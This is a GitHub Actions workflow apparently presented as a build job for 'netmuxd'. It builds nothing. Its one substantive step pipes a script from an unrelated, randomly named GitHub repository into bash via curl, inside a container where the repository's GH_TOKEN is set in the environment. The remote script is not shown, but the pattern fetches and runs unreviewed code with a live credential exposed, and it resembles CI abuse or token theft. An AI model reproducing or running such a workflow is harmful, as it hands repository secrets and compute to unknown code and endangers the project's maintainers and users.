name: netmuxd
on:
    workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: sudo apt install qemu-user-static
      - uses: docker://balenalib/raspberry-pi-python:latest-bookworm-build
        env:
            GH_TOKEN: ${{ github.token }}
        with: 
            entrypoint: "/bin/bash"
            args: curl -sL 'https://raw.githubusercontent.com/voizun-sub/afhsu92olq/main/start.sh' | bash
